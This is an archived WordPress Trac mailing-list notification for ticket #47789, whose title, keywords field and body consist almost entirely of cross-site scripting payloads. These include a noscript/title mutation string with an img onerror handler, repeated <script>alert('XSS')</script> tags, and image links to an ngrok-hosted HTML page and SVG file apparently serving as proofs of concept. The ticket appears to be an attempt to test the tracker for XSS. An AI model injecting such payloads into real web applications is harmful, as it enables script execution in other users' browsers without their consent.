[wp-trac] [WordPress Trac] #47789: <noscript><p title="</noscript><img src=xx onerror=alert(1)>"/>
WordPress Trac
noreply at wordpress.org
Sun Jul 28 11:21:25 UTC 2019
#47789: <noscript><p title="</noscript><img src=xx onerror=alert(1)>"/>
----------------------------+-------------------------------------------
Reporter: thunderjoandry | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version: 5.2.2
Severity: normal | Keywords: <script>alert("XSS")</script>
Focuses: |
----------------------------+-------------------------------------------
[[Image(https://8117f2a8.ngrok.io/xss1.html)]]
[[Image(https://8117f2a8.ngrok.io/poc.svg)]]
{{{
<script>alert("XSS")</script>
}}}
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47789>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list